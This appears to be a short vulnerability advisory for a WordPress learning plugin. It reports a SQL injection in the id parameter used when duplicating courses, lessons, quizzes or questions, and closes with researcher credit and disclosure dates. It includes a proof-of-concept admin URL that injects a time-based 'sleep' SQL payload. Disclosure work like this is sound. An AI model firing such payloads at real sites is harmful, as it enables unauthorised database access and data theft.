The plugin does not sanitise, validate and escape the id parameter before using it in SQL statements when duplicating course/lesson/quiz/question, leading to SQL Injections issues
(Id needs to start with a valid course/lesson/quiz/question ID): https://examle.com/wp-admin/edit.php?post_type=lp_course&lp-ajax=duplicator&id=149%20and%20sleep(1)%23
JrXnm
JrXnm
Yes
2021-11-09 (about 9 months ago)
2021-11-09 (about 9 months ago)
2022-04-11 (about 4 months ago)